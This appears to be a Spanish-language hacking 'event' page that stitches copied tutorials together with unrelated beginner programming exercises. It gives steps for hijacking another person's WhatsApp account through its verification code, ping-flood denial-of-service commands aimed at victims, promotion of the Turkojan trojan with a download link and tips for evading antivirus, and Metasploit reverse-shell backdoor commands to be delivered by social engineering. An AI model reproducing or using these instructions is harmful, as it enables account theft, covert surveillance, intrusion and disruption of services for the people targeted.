evento del 18,19,20,21 y 22 - 7ta entrega Hackersoft
Te animamos a que te inscribas y ser uno de los mejores miembros en HACKERSOFT,
tienes muchas posibilidades de obtener un BOTON DE
DISTINCION, demostrar a tu familia, amigos, compañeros, novia - novio, que perteneces a la nueva sociedad tecnológica HACKERSOFT.
Con tu afiliación podemos brindarte mejores servicios y capacitación, te invitamos a que nos apoyes afiliándote como miembro.
NOTA: Cada botón distintivo está registrado Copyright, demás cada persona que se afilie cada botón o distintivo tendrá un código de barra único, la copia o preventa de estos distintivos de pie,
para demanda derecho de autor. Este evento HACKERSOFT, es algo legítimo, único, como tal merece respeto las actividades, distinciones que otorgamos a nuestros afiliados, por el respeto de cada
persona en aprender e incentivarlos.
enero 21-22
contenido tema principal de la 7ta entrega hackersoft
¿Qué métodos usan los hackers para entrar en otro ordenador?
Como saber la IP de otra persona Sin programas 2015
Controlar remotamente otro PC sin ningún programa
Cómo hackear una cuenta de WhatsApp solo con un truco. Y como protegerte
Más de una vez a cualquiera se le ocurrió la posibilidad de revisar en el celular de otro las diferentes conversaciones de WhatsApp.
Hoy te traemos un importante fallo de seguridad de WhatsApp, entre tantos otros bugs y vulnerabilidades. Un método que permite robar cuentas de WhatsApp.
Con un simple procedimiento, desde el dispositivo móvil de uno se puede registrar el número de otro usuario para acceder así a sus diálogos. Hay una manera rápida y sencilla de acceder al
WhatsApp de otra persona para leer sus conversaciones, por lo que si no quieres que te pase a ti debes leer esto.
Esto no es necesariamente un hack sino un exploit del servicio de activación de WhatsApp que permite registrar el número de otra persona en tu teléfono para acceder a sus conversaciones.
Algunos lo encontrarán útil, a otros les parecerá una tontería, lo cierto es que esta información que encontramos en TheHackerNews nos parece importante compartirla para que no pierdas
de vista tu cel.
Requisitos:
- Tener acceso al celular en cuestión (al menos por cinco minutos)
- Contar con un segundo móvil con WhatsApp recién instalado y sin activar
- Que el primer teléfono, del que se quiere conseguir el material, tenga activo el respaldo de chats en WhatsApp
- Conocer el número de cel de la víctima (Obviamente)
Procedimiento:
Con el segundo celular abre WhatsApp y avanza a la pantalla de registro. Cuando te pida el número a registrar introduces el del móvil a revisar. Como parte del proceso de verificación de
identidad se envía un SMS al teléfono de la víctima con el código de activación.
Al tener acceso al cel podrás consultarlo de inmediato, siempre y cuando tenga activas las notificaciones en la pantalla de bloqueo (puede que la persona tenga clave para desbloquearlo). El SMS
de WhatsApp es tan corto que puede visualizarse sin problemas.
En caso de que no tenga las notificaciones activas o que el celular esté bloqueado y no conozcas la clave, pasados 5 minutos sin introducir el código, WhatsApp permite la opción de llamar para
decirlo por móvil; tendrás que esperar para recibir la llamada con el código (PIN se les dice en algunos casos). La gracia de la llamada es que puede recibirse aún si el teléfono está
bloqueado.
Una vez se tenga el código de verificación de WhatsApp se ha completado el robo. La cuenta pasa a ser tuya y pueden pasar días hasta que el propietario original la recupere.
Con el PIN haces la activación de WhatsApp en tu cel. Si el otro dispositivo tiene activo el respaldo de mensajes (se activa de modo manual en la configuración de chat y permite
seleccionar respaldos diarios, semanales o mensuales), podrás descargarlo en tu celular, y es así como tienes acceso a los registros de chat de la víctima. Si esto no está activo entonces el hack
solo sirve para mandar mensajes utilizando su cuenta.
El problema para la otra persona no es solo que accedan a sus conversaciones, sino que tendrá que esperar 25 minutos para poder reactivar WhatsApp en su móvil, lo cual es tiempo suficiente para
que hagas de las tuyas. Así que te recomendamos no prestarle tu aparato a cualquiera.
Cómo evitar el robo de tu cuenta de WhatsApp
Si recibes un SMS extraño de WhatsApp (o una llamada) con un PIN de verificación, sospecha que alguien puede estar intentando robarte la cuenta y toma medidas de protección.
Piensa si estás dispuesto a perder parte de la funcionalidad del sistema operativo y el asistente personal por reconocimiento de voz desactivando ciertas notificaciones que se pueden
conseguir en pantalla bloqueada y que permitirían robar tu cuenta de WhatsApp si pierdes el teléfono.
Cómo recuperar tu cuenta de WhatsApp si te la han secuestrado
Si llegas tarde y ya te han robado la cuenta no te desesperes. Aún puedes recuperarla.
Lo primero es intentar abrir sesión en tu cel solicitando e introduciendo un nuevo código de activación en tu celular.
Si el "hacker" es especialmente perverso, puede pedir numerosas veces el PIN de verificación tras robar tu cuenta. Por seguridad WhatsApp va alargando los tiempos entre esos intentos y ya no sean
25 minutos, lo cual puede conducir a que te pases horas o incluso días sin poder hacer un nuevo login en tu móvil.
Si la cosa se alarga en exceso contacta con WhatsApp y cuéntales tu situación para que puedas recuperar el acceso a tu cuenta.
Una vez recuperes el control de la cuenta toma las medidas preventivas que detallamos arriba.
Hay que dejar claro que secuestrar las cuentas de WhatsApp de terceros es delito y que el único propósito de este artículo es divulgar una vulnerabilidad para proteger a los usuarios y para que
WhatsApp y las operadoras le pongan solución lo antes posible, añadiendo procesos de verificación de identidad más seguros (por ejemplo con verificación en dos pasos, o a través de un mail de
confianza), así evitando que puedas ser "hackeado" de un modo tan lamentablemente sencillo.
En los celulares uno maneja datos muy sensibles y sin embargo pareciera que ni los usuarios ni los desarrolladores se preocupan por la seguridad de este tipo de
dispositivos.
Cada una de las decenas de aplicaciones que tenemos instaladas significa un posible punto de acceso para los hackers, incluso, por ejemplo, la tan popular
WhatsApp.
Y si no, basta con preguntarle al hacker español Chema Alonso, quien demostró cómo se puede hacker una cuenta de WhatsApp con muy pocos conocimientos técnicos y en
cinco simples pasos.
"La verdad es que de tan simple este método da hasta un poco de miedo —contó Alonso a Clarín.com y detalló: Con que solo dejes el celular en tu
escritorio y vayas al baño, cuando vuelvas ya te pueden haber robado la cuenta. Y si el atacante quiere, te va a costar mucho recuperar tus datos".
Mientras estás en el baño, un hacker puede ingresar a tu celular en 5 pasos:
1) Instalar la app
El hacker debe tener un teléfono con WhatsApp recién instalado pero sin activar (incluso hay quienes pueden usar una PC con un emulador).
2) Ingresar el número de la víctima
Cuando WhatsApp pide que se ponga el número de teléfono, se debe poner el de la víctima.
3) Conseguir el código de seguridad
WhatsApp pueden enviar el código de seguridad de dos formas: por SMS o por llamada telefónica. El hacker deberá elegir la última opción, ya que cuando entra una
llamada a un celular, automáticamente se desbloquea el équipo y cualquier puede atenderla. El hacker deberá atender esa llamada y recibirá el código de
seguridad.
4) Introducir el código
Una vez que el hacker tiene el código, lo ingresa en su teléfeno y la cuenta se borrará del celular original.
5) ¡Ya está!
El hacker ahora tiene acceso a los contactos, conversaciones y puede escribir en nombre de la víctima. Podrá hacerlo hasta que la víctima se dé cuenta del robo y
notifique a WhatsApp, que demora media hora en reponer la cuenta a su usuario legítimo.
1. Desarrollar un pantallazo de una veterinaria con frame en netbean
2. Desarrollar un pantallazo de un cajero automàtico
3. Desarrollar un pantallazo de un centro de comidas.
4. Deben haber descargado Netbeans
actividad iii
LENGUAJE PROGRAMACION C++
1. Crear registro de notas de alumnos del Colegio Mixto, para la cantidad de 4000 estudiantes Secundaria
2. Datos a capturar: tarjeta identidad, nombres, apellidos, grado, materia, notas 1, notas 2, nota 3, definitiva, nombre del director de grupo.
3. Crear el contador Alfanumerico, digitas dos letras, cada letra convertirla en numero binario.
NOTA: DEBEN REALIZAR LOS EJERCICIOS Y ASI APRENDER A MANEJAR LOS LENGUAJES DE PROGRAMACIÒN.
SEGUNDO BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL II
ACTIVIDADES
VAMOS A MANEJAR UN POCO DE HTML
Para realizar esta actividad debes tener conciencia que ir poco a poco ir apendiendo
ACTIVIDAD 1: Entra al navegador entra a la pagina google, escribe html, cuando te aparezca los link de busquedad, busca tres pautas: CONCEPTO, COMANDOS, ESTRUCTURA
ACTIVIDAD 2: Desarrolla el siguiente ejemplo:
Características de los campos del formulario:
Campo Nombre de la caja de texto Tamaño
Nombre nombre 12
Primer Apellido apell1 (por defecto)
Segundo Apellido apell2 (por defecto)
Domicilio domicilio 18
Código Postal CP 5
Teléfono tel 9
e-mail mail 25
ACTIVIDAD 3: Donde vamos a desarrollar o escribir el HTML, debes descargar el siguiente programa:
Amaya - editor HTML
Amaya es una herramienta combinada del W3C compuesta por un navegador web y una herramienta de autor. Cualquier página web que se abra puede ser editada inmediatamente. Se pueden ver y
generar páginas HTML y XHTML con hojas de estilo CSS, expresiones MathML y dibujos SVG. Una gran característica consiste en que puede ver los enlaces que se crean con el editor.
Visualiza imágenes, como las que tienen formato PNG y un subconjunto del formato de Gráficos Vectoriales Escalables (SVG), como figuras básicas, texto, imágenes y foreignObject (el último es útil
para incluir fragmentos HTML o expresiones MathML en los dibujos). Los gráficos están escritos en XML y pueden ser mezclados libremente con HTML y MathML.
Es software libre, disponible para sistemas tipo Unix, Linux, Mac OS X, Windows y otras plataformas. La última versión liberada es la 11, que fue lanzada el 16 de diciembre de 2008. Esta versión
soporta HTML 4.01, XHTML 1.0, XHTML Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, muchas características CSS 2, e incluye soporte para gráficos SVG (transformación, transparencia y animación SMIL),
además se puede, no sólo visualizar sino además editar, de manera parcial, documentos XML. Se puede decir que es una aplicación <<internacionalizada>>.
De este documento PDf, van a selecionar 5 ejercicios, con el programa Amaya Editor HTML, realizar las actividades, y enviarlas al correo: eventohackersoft@gmail.com
TERCER BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL III
ACTIVIDADES
QUE TANTO SABEN DE LOS NAVEGADORES, CUAL ES EL MAS CONFIABLE
ACTIVIDAD 1: Cuantos navegadores conocer, y en cual confias mas.
ACTIVIDAD 2: Instala Chrome - Motzilla, luego de instalarlos prueba cual se comporta mejor.
ACTIVIDAD 3: Actualiza los plugin, que es plugin, en google en la zona de busquedad coloca plugin, tendras un concepto mas amplia.
ACTIVIDAD 4: Por que cree es tu que se congelan los navegadores, falta de memoria RAM, espacio de Memoria.
CUARTO BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL IV
ACTIVIDADES
QUE TANTO CONFIAS DE TUS ANTIVIRUS Y ANTIMALWARE
ACTIVIDAD 1: Identifica que tan eficiente es tu antivirus, malware, cada cuanto lo actualizas
ACTIVIDAD 2: Como sabes que tu antivirus es efectivo, contra virus, malware, troyanos, spam
ACTIVIDAD 3: Cuantos antivirus debes tener instalado en tus dispositivos.
QUINTO BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL V
ACTIVIDADES
CUAL DISPOSITIVOS MANEJAS MAS TIEMPO: PC - PORTATIL - SMART PHONE - TABLET
ACTIVIDAD 1: Como los identificas a cada uno de ellos.
ACTIVIDAD 2: Que sistema operativo tiene cada uno, como has aprendido de cada uno de ellos, que tiempo le has dedicado.
ACTIVIDAD 3: Como te has sentido al manejar del PC AL PORTATIL, DEL PORTATIL AL SMART PHONE, del SMART PHONE a la TABLET.
ACTIVIDAD 4: Que capacidad tiene cada uno de ellos, que guardas en cada uno, estan seguro tus datos
ACTIVIDAD 5: Que tipo de conexion empleas para internet : A. WIFI . B. PLAN DE DATOS C. WIFI PIRATA.
SEXTO BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL VI
ACTIVIDADES - 19 ENERO DEL 2016 - CONTENIDO PRINCIPAL DEL EVENTO
Todo lo que debes saber sobre un DDoS
Un jodido DDos (que viene de Distributed Denial of Service) es un ataque (que se puede realizar de diversas formas) a un sistema de computadoras que causa que un servicio o recurso sea
inaccesible a los usuarios legítimos (por ejemplo, y en nuestro caso, una página web). Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la
red de la víctima o sobrecarga de los recursos del sistema de la víctima (incluso aunque tengas un VPS, por ejemplo).
Después de este copypaste de Wikipedia, hablemos claro. En estos artículos vamos a hablar de las diversas formas que hay de atacar mediante DDoS, y qué software o medios se emplean.
Normalmente la idea básica en nuestra temática la podemos resumir en esto.
Víctimatiene página web -> Bastardo quiere tumbarla -> Bastardo usa un ataque DDoS lo
suficientemente potente para que el hosting de la víctima colapse -> Los usuarios que quieren entrar a la web de la víctima se encuentran con que está caída mientras dura el
ataque -> Bastardo tiene orgasmos de placer
Como veis un ataque DDoS es una faquinshit. Se pueden citar cientos de formas de atacar una web, sin embargo en la actualidad destacan por su relevancia programas como LOIC (que os
pasaré y enseñaré a usar), usados por los “Anonymous” para joder al FBI, etc. Como hoy no quiero asustaros con mucha información, vamos a empezar por la base de la pizza… lo más básico en cuánto
a ataques DDos. Se llama el “Ping de la Muerte” y aunque en la actualidad su funcionalidad no es de gran valor, nos sirve para entender mejor la historia de los ataques DDoS y cómo
funcionan.
Ataque DDoS en CMD – Ping de la Muerte
Este tipo de ataques se realizaron mucho hace más de 15 años, e hicieron mucho daño en el creciente ambiente cibernético de la época. El sistema consistía en mandar numerosos paquetes
ICMP grandes (mayores a 65.535 bytes) con el fin de colapsar el sistema atacado. Todo ello se realizaba a través de pings deformados con tamaños mucho mayores a los comunes 64 bytes. Hoy
en día realizar dichos ataques DDoS mediante pings es muy sencillo, sin embargo todas las redes actuales están protegidas ante dichos ataques tan anticuados, por lo que hace falta
mandarlos desde varios ordenadores para que puedan funcionar. Si bien los pings deben tener un peso de más de 65.535 bytes, yo no he conseguido mandarlos con más de 15.000 bytes, por lo
que necesitaría otros usuarios mandando el mismo ataque DDoS a la misma web para tener la posibilidad de tumbar una página web con un hosting normalillo
Ahora explicaré cómo se realiza el ataque. Entramos a nuestro menú de Windows y ejecutamos CMD. Se nos abrirá la típica pantalla de MSDOS en la que, si ponemos ping, veremos las opciones de la
función que empleamos.
Sobra decir que las opciones que emplearemos para nuestro ping son “-t” y “-l”. Con la “-t” mandamos el ping de forma repetida y continuada, y con la “-l” elegimos el peso de cada ping, en
este caso búfer. Ahora debemos conocer la IP de la web a la que queremos atacar. Para ello tecleamos un nuevo y simple comando: “ping www.webqueatacare.com” y damos a “Intro”. En pocos
segundos nos dará una IP como veis a continuación:
Ahora, con la IP de nuestra víctima, debemos teclear el nuevo comando que hará temblar la página. Os recomiendo escribirlo en un bloc de notas y luego pegarlo en el CMD para que podáis
modificarlo rápidamente. El formato debe ser así: “ping 123.111.23.453 -t -l 15000”. Lógicamente debéis cambiar la IP por la de vuestra víctima, y la cifra final es la cantidad de bytes
que estáis enviando. La “-t” y “-l” son los comandos de ping que empleamos. En la siguiente pantalla podéis ver un ataque de pings exitosos.
Si
los pings no dan respuestas y da un mensaje del tipo “Tiempo de espera agotado para esta solicitud”, significa que la cantidad de bytes que hemos puesto es muy alta. Debemos ir regulando la
cantidad para saber cuantos bytes soporta por ping. Una vez sepamos la cifra máxima soportada, es cuanto entra en juego el trabajo en equipo. Busca amigos, foreros, webmasters y/u
otro tipo de gente que esté dispuesta a ayudarte y facilítales la información, cantidad de bytes y método y poneros a funcionar todos a la vez en la misma web. En función del tipo de hosting que
tenga la víctima y la calidad del mismo es posible que podáis tumbar una web con esta técnica tan simple y antigua
hacer un ataque de
denegacion de servicio (DDoS) sin que se nos queme el router y nos deje sin
conexion.
Como como saturar una red (modem) con el antiguo "ping de la muerte" que ya está prácticamente parchado en todos los computadores de mundo. El punto es que el resultado del "ping
de la muerte" ya no es efectivo porque las redes pueden soportar ese tamaño de paquete, entonces... Qué sucedería si muchos computadores unidos hacen el ping de la muerte contra una
sola red ???... En teoría debería caer, ya que cualquier exceso en una red generaría un D.o.S, incluso si muchas personas (sin ningún código mágico) se conectase a una red, ésta se cae...
De esté modo se entra a explicar lo que hace el famoso ping de la muerte y como crear un batch que genere un loop infinito para gastarle a la red un pedazo de conexión extra
permanentemente. Y si se une muchos "amigos" con este Batch quizas botar la web por D.o.S.
Por último, vale mensionar que hay metodos D.o.S mucho más efectivos que este, pero es interesante este método y sirve para explicarse un poco mejor que es un D.o.S.
Bien, hoy vamos a aprender, a como saturar un modem, a base de pings.
Una aclaración antes de todo, esto ya NO funciona en el90%de los casos, pero he pensado que por saber mas o menos como se realiza un ataque D.o.S, que no falte jeje.
Un ping es un tipo de mensaje ICMP, que se usa para ver si una máquina se encuentra operativa y accesible.
El procedimiento es enviarle un ping a la máquina; ésta lo recibe y contesta. Al recibir la contestación ya sabemos que la máquina vive. Si no se recibe en un plazo dado se considera como no
accesible (la máquina podría estar apagada, o todos los "caminos" en la red hacia ella cortados).
La manera de usar esto de forma ofensiva consiste en mandar más pings a un usuario de los que su máquina pueda contestar, saturándole su conexión a Internet.
Un ping de la muerte es un tipo de ataque enviado a una computadora que consiste en mandar numerosos paquetes ICMP muy pesados (mayores a 65.535 bytes) con el fin de colapsar el sistema
atacado.
Los atacantes comenzaron a aprovecharse de esta vulnerabilidad en los sistemas operativos en 1996, vulnerabilidad que en 1997 sería corregida.
Este tipo de ataque no tiene efecto sobre los sistemas operativos actuales.
Es un tipo de ataque a computadoras que implica enviar un ping deformado a una computadora. Un ping normalmente tiene un tamaño de 64 bytes; algunas computadoras no pueden manejar pings mayores
al máximo de un paquete IP común, que es de 65.535 bytes. Enviando pings de este tamaño puede hacer que los servidores se caigan. Este fallo fue fácil de usar, generalmente, enviar un paquete de
"Ping de la Muerte" de un tamaño de 65.536 bytes es ilegal según los protocolos de establecimiento de una red, pero se puede enviar un paquete de tal tamaño si se hacen fragmentos del mismo;
cuando la computadora que es el blanco de ataque vuelve a montar el paquete, puede ocurrir una saturación del buffer, que causa a menudo un fallo del sistema. Este exploit ha afectado a la
mayoría de Sistemas Operativos, como Unix, Linux, Mac, Windows, impresoras, y los routers. No obstante la mayoría de los sistemas operativos desde 1997-1998 han arreglado este problema, por lo
que el fallo está solucionado.
Como hacerlo¿?¿
el ping de la muerte es muy facil de hacer
desde el simbolo de sistema se tira un ping extendido de mas de 65.535 byte.
el comando seria este:
EJ:
ping -t 192.168.1.1 -l 65.596
-t: ping al host especificado hasta que se pare.
-l: es la longitud del ping (cantidad de bytes). comprobado que funciona:
si funciona eso no lo se, por que no me anime a probarlo. La mayoria dice que no. Supongo que debe ser verdad que no funciona por que es muy viejo.
Pero si se animan comprueben si funciona.
algo mas reciente: Un ping flood, consiste en saturar una línea lenta con un número de paquetes ICMP suficientemente grande. Esta saturación causará una degradación del servicio importante. El ataque en
cuestión utiliza las definiciones de la longitud máxima de protocolos así como la capacidad de fragmentación de los datagramas IP.
La longitud máxima de un datagrama IP es de 64K (65535 Bytes) incluyendo la cabecera del paquete (20 Bytes).
El protocolo ICMP es el que se utiliza para la comunicación de mensajes de control de flujo en las comunicaciones.
Luego para enviar un mensaje ICMP tenemos disponibles 65535(datos) 20 (cabecera IP) 8 (cabecera ICMP) = 65507 Bytes.
En el caso de enviar órdenes al sistema operativo para que envie un datagrama de longitud de 65510 bytes (inferior a los 65535) con lo que los datos a enviar cogen un único paquete IP
(fragmentado en N trozos, pero pertenecientes al mismo datagrama IP).
Si sumamos:
65510 + 20 + 8 =65538
Debido a que el espacio disponible tan sólo es de 65535 bytes al reensamblar el paquete en el destino se suelen producir errores de overflow/coredump que causan la parada del servicio o del
sistema atacado.
Como espiar a tu victima - HACKEAR Y ESPIAR PC SIN MANDAR NADA
Turkojan 4
Ayer salio la version 4 del troyano turco, troyano que se caracteriza por su gran cantidad de herramientas y sus funciones FUN.
Por ahora es indetectable y tiene la opcion de cambiarle el lenguaje a español y a otros idiomas mas.
Lo nuevo:
Remote Desktop feature added.You can view remote screen and control it via your keyboard and mouse.
Now you can record video from remote webcam.
Audio streaming feature added.
Now you don't need to download images from remote computer,you can view them with thumbnail manager.
You can get MSN logs with MSN Sniffer.
You can block harmful web-pages on remote computer.
You can manage remote computer with ms-dos commands.(Remote Shell)
New functions added for server secrecy
-Now it is harder to delete server
-Server can't be show in registry,searching files,msconfig,etc.
-Server can't be shown in ctrl+alt+del menu[Vista/Xp/95/98/ME].
-Server prevents system restoring.It deletes all system restore points.
Server size is %60 smaller now.
Connection bug fixed
Now server can't be dedectd by any anti-virus software,
but i think it will be dedected soon.
Some changes were made in Client appearance
Now advanced keylogger can capture clipboard changements.
You can install any file to remote computer from internet via Remote Downloader.
Now you can get more information about remote computer.
You can learn installed softwares on remote computer.
Help mode added.So you can create visible servers.
Imagenes:
En español:
Editado: Cuando lo ejecutan al cliente modifica su pagina de inicio por la
pagina principal del troyano del Internet Explorer 6. Si nesecitan saber como sacarla dejen un comentario asi les
respondo.
Q: What is Turkojan?
A. Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.
You can use Turkojan for manage computers,employee monitoring and child monitoring...
Q: How can I download Turkojan?
A. You can download Turkojan from here .
Q: What operating systems are supported?
A. Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista.
Q: When I try to download Turkojan a problem occurs,what can i do?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So your antivirus software could prevent
downloading it.Close your antivirus software and try again..
Q: I have downloaded Turkojan,what should i do now?
A. You need to do some configrations to use Turkojan :
- Firstly, you need to forward port 15963(TCP) on your router.
- If you don't have static ip address,your IP address will change every time you connect to the internet.So your server won't be able to reach you.
To prevent loosing servers because of Dynamic IP Address System,you need to create an account from No-ip or DynDNS services.
Q: My antivirus software says that Turkojan includes a virus,is it true?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So your antivirus software can be the problem
that prevents installing and downloading Turkojan,you can close your antivirus software and try to install Turkojan again.We suggest you to buy Turkojan Private Edition.
Q: How can I forward port 15963?
A. You can get detailed information about forwarding ports from here .
Q: Will Turkojan slow down my computer?
Y. No. Turkojan is a really small and efficient application. It works quietly in the background and has been optimized to minimize resource use. You will not notice any decrease of performance of
your computer..
Q: I have forgetten the password of my router,what should I do?
A. You can reset your router and load default settings.
Q: How can I understand that my ports are successfully forwarded?
A. You can use Port Tester in Turkojan Client.Check local tools in left menu..
Q: Why should I register a No-Ip veya DynDNS account?
A. If you don't have static ip address,your ip address will change every time you connect to the internet.So your server won't be able to reach you.
To prevent loosing servers because of Dynamic IP Address System,you need to create an account from No-ip or DynDNS services.
You can check videos, showing how to create accounts from these services..
Q: I have forwarded tcp port 15963 and create an account from No-Ip or DynDNS service,what should I do now ?
A. Now you need to create a server and send it to the computer that you want to connect.You can learn creating server from here.
Q: I have created a server from Server Editor,but I can't see any server in directory where I save. Why ?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.
Your antivirus software can label Turkojan Public Edition as unwanted application,so we suggest you to uninstall your antivirus software.
Q: I have created server,but I can't send it via MSN or mail, what should i do ?
A. Server file is an application so you can't send this type files via MSN and mail.So you need to add these files into archieve.We suggest you to use Winrar or Winzip..
Q: I did everything but when I send a server to my friend , I can't connect him/her.Why ?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs. So antivirus software which is installed on
remote computer can cause this,we suggest you to buy Turkojan Private Edition.
Q: My and my friend's antivirus softwares are closed,but I still can't connect,what should I do ? ?
A. Your friend should uninstall antivirus software completely.
Q: I can see remote computer on Turkojan,but I can't manage this computer.What should I do?
A. Congratulations.. To manage or start monitoring remote computer,you need to select it from the list and double click on it...
Q: I want to order Turkojan Private Edition.How much should I pay and how can I pay ?
A. You can contact us via e-mail,we will reply it as soon as possible..
Q: What are the differences between Turkojan Public Edition and Turkojan Private Edition ?
A. Turkojan Private Edition can't be labelled as unwanted program by antivirus softwares.That means Turkojan will work without any problems with Antivirus softwares.
Q: After I purchase Turkojan Private Edition,if I have any problems,what can I do ? ?
A. If you have any problems you can contact us 7/24 via MSN and mail. Also you will be able to login private zone,so you can get help from other customers that bought Turkojan...
Q: How can I login private zone ?
A. We will send you a username and password after you purchase Turkojan Private Edition,so you will be able to login with these information..
Q: Is Turkojan illegal ?
A. No, there is nothing illegal about Turkojan itself. The vast majority of its developer is law-abiding person who create his programs exclusively for legitimate purposes.
There are many situations when monitoring the computer activity is perfectly legal: the parents can use key loggers to protect their children from online abuse,the companies may use Internet
monitoring software to ensure that their employees don't misuse corporate Internet connection and so on. Of course some people can
use the very same software for stealing passwords, credit card numbers or corporate secrets. However, even in this situation it's not the software that breaks the law, but the person using it.
There are also uses that are not strictly illegal, but have some moral ambiguity to them (for example, a computer activity monitor may be used to catch in the act a cheating spouse). When
Turkojan is purchased the purchaser agrees that the computer it will be installed on is his or her own computer..
Q: Do I break any law by using Turkojan ?
A. It depends on the way you use them. In most cases you have the right to install any programs on the computer that belongs to you. You also have the right to install programs on other peoples'
computers if you have their permission. Installing a monitoring program on another person's computer without his/her permission may be illegal. We will not try to give you any advice on the legal
side of computer activity monitoring because everything depends on your particular situation. If you are in doubt, consult your lawyer..
Q: Can Turkojan be used for any legitimate purposes ?
A. Yes, sure. Here are just a few examples of perfectly legal uses of computer activity monitoring tools. You can:
- Monitor your children's online activity to make sure they don't visit pornographic Web sites or don't make any dubious acquaintances.
- Ensure no one is accessing your personal files while you are away from the computer.
- Keep track of the inexperienced users' activity to quickly locate the problem if they damage any system files.
- Monitor your employees' computer activity to make sure they are really working and don't do anything that may be a source of legal problems for you.
- Find out if someone uses your computer while you are away. . .
Q: Why should I buy Turkojan Private Edition ?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So Turkojan Private Edition is special for you
and can't be labeled as unwanted program. During support period if our software is known to be detected we will work to ensure an update is released that will eliminate the problem..
aca les dejo este video y todo lo necesario par poder controlar una pc con turkojan v4 por sierto les dejare el link del turkojan v goold con todo lo que necesitan suscribansen y comenten
cualquier duda ya saven solo comenten saludos :D http://www.mediafire.com/?81d6574804k1fov
Turkojan es un troyano de conexión inversa. Con este troyano tenemos acceso 100% al PC , podemos conseguir contraseñas , editar registro de Windows , bajar archivos , subir archivos etc. El
servidor del troyano tiene un 65% de indetabilidad.
Este programita es parecido al BIFROST pero con un manejo TOTALMENTE EN ESPAÑOL y MUCHO MAS SENCILLO.
Bueno con este programa podemos ACCEDER A TODOS LOS RINCONES DEL PC DE NUESTA VITCTIMA , MANEJAR SU RATON, VER SUR FOTOS, BORRARLE ARCHIVOS , DESINSTALARLE PROGRAMAS, ENFIN DE TODO LO
QUE OS PODAIS IMAGINAR ES COMO SI EL PC LO TUVIESEIS DELANTE VUESTA…si pero seguro que lo detecta su antivirus… en verdad debería pero he metido en el pack el THEMIDA que hace INDETECTABLE
nuestro TROYAN
Trojan Shells
"Creating a backdoor & Hacking the webcam or desktop of Windows 8
using Metasploit"como hackearpc tan solo sabiendo la ip
HACK ANY WINDOWS 7 WITH METASPLOIT
In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which “provides all of the features of the
Metasploit payload system to exploits that have been launched outside of the framework“ Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the
quotes:
msfpayload
windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP
address, my IP is 192.168.10.5.
After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You
can change the name of the file so that it is not that obvious. Launch Metasploit and set the exploit by typing these commands in your msfconsole: use
exploit/multi/handler set payload
windows/meterpreter/reverse_tcp set lhost
192.168.10.5 set lport 4444 exploit If all goes well, you should be able to establish a meterpreter session. Typesysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC,
record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell. it,s cool to take a screenshot with meterpreter command screenshot. Regards.
Create Simple Exploit Using Metasploit to Hack Windows 7 - See more at:
http://www.hacking-tutorial.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/#sthash.5aelhPhi.dpuf
As I have already wrote on my previous post about how to add a user with administrator rights (you can read thetips and trickhere), today I will wrote a simple tutorial to create anexploitforWindows 7and all Windows.
Everyone love and like the simple way isn’t it? that’s why in my previous tutorial and today tutorial I wrote
everything about simple and easy to use
The tutorial today we will learn how to create a simpleexploit(easy to create and easy to implement) and how we connect toWindows 7victim that already executed our simpleexploit…simple isn’t it?
Okay let’s start the tutorial.
Requirements :
1. Metasploit Framework 2. WindowsXPand earlier Windows version (I
useWindows 7SP1)
Step by Step :
FYIin this tutorial I use
Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91. 1. Open your terminal console and type the following command :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X
> Desktop/v4L.exe
The above command will create Windows executable file with name "v4L.exe" and will be saved on your desktop.
2. Now you need to copy your newly created v4L.exe to your windows 7 system. If you didn’t know how to
share your backtrack 5 folder, you can videw the tutorialhow to share folder in your Backtrack (view tutorial here).
3. The next step we need to create a handler to handle the connection that came to our Backtrack system from
simpleexploitwe’ve already created before. Open your Metasploit console, see the picture and type the following command :
Information :
use exploit/multi/handler --> use the
metasploit handler
set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)
set lhost 192.168.8.91 --> set our local
IP address that will catch the reverse connection
exploit-j -z --> start the handler
4. Now you can try to execute the simpleexploitwe have already copy to windows 7 and see if our handler receiving something or not. Below was the screenshot of my handler whenWindows 7executed the simpleexploit:
I usesessions -lto listing every sessions that already open there. 5. To interact with
the available session, you can usesessions -i
<session_id>. From there you can do other command as you want.
- See more at:
http://www.hacking-tutorial.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/#sthash.5aelhPhi.dpuf
Welcome back, my tenderfoot hackers!
Recently, Microsoft released a new patch (September 8, 2015) to close another vulnerability in their Windows Vista, 7, 8, and
8.1 operating systems. The vulnerability in question (MS15-100) enabled an attacker to gain remote access to any of these systems using a
well-crafted Media Center link (MCL) file.
